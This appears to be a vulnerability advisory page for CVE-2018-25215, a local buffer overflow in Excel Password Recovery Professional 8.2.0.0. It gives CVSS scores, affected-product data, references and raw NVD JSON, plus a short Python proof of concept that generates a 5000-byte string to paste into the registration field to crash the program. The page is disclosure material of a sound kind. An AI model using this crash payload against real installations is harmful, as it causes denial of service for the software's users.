CVE-2018-25215

Description

Excel Password Recovery Professional 8.2.0.0 contains a local buffer overflow vulnerability that allows attackers to cause a denial of service by supplying an excessively long string to the 'E-Mail and Registrations Code' field. Attackers can paste a crafted payload containing 5000 bytes of data into the registration field to trigger a crash when the Register button is clicked.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:passfab:excel_password_recovery:8.2.0.0:*:*:*:*:*:*:* - VULNERABLE

Excel Password Recovery Professional 8.2.0.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2018-25215
# Generate a payload of 5000 bytes to trigger the buffer overflow

def generate_payload():
    # Create a string of 5000 'A' characters
    payload = "A" * 5000
    return payload

if __name__ == "__main__":
    exploit = generate_payload()
    print(f"Payload generated with length: {len(exploit)}")
    print("Copy the payload and paste it into the 'E-Mail and Registrations Code' field.")
    print("Click 'Register' to trigger the Denial of Service.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2018-25215
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2018-25215
[3] CVE Details https://www.cvedetails.com/cve/CVE-2018-25215/
[4] VulDB https://vuldb.com/cve/CVE-2018-25215
[5] https://www.exploit-db.com/exploits/46003
[6] https://www.recoverlostpassword.com/
[7] https://www.vulncheck.com/advisories/excel-password-recovery-professional-local-buffer-overflow-dos

Raw JSON Data

JSON

{"cve": {"id": "CVE-2018-25215", "sourceIdentifier": "[email protected]", "published": "2026-03-26T14:16:05.323", "lastModified": "2026-03-31T15:17:16.393", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Excel Password Recovery Professional 8.2.0.0 contains a local buffer overflow vulnerability that allows attackers to cause a denial of service by supplying an excessively long string to the 'E-Mail and Registrations Code' field. Attackers can paste a crafted payload containing 5000 bytes of data into the registration field to trigger a crash when the Register button is clicked."}, {"lang": "es", "value": "Excel Password Recovery Professional 8.2.0.0 contiene una vulnerabilidad local de desbordamiento de búfer que permite a los atacantes causar una denegación de servicio al proporcionar una cadena excesivamente larga al campo 'E-Mail and Registrations Code'. Los atacantes pueden pegar una carga útil diseñada que contiene 5000 bytes de datos en el campo de registro para desencadenar un fallo cuando se hace clic en el botón 'Register'."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:passfab:excel_password_recovery:8.2.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "BD3D5682-DB71-4792-84D2-425CEBE42BCB"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/46003", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.recoverlostpassword.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/excel-password-recovery-professional-local-buffer-overflow-dos", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}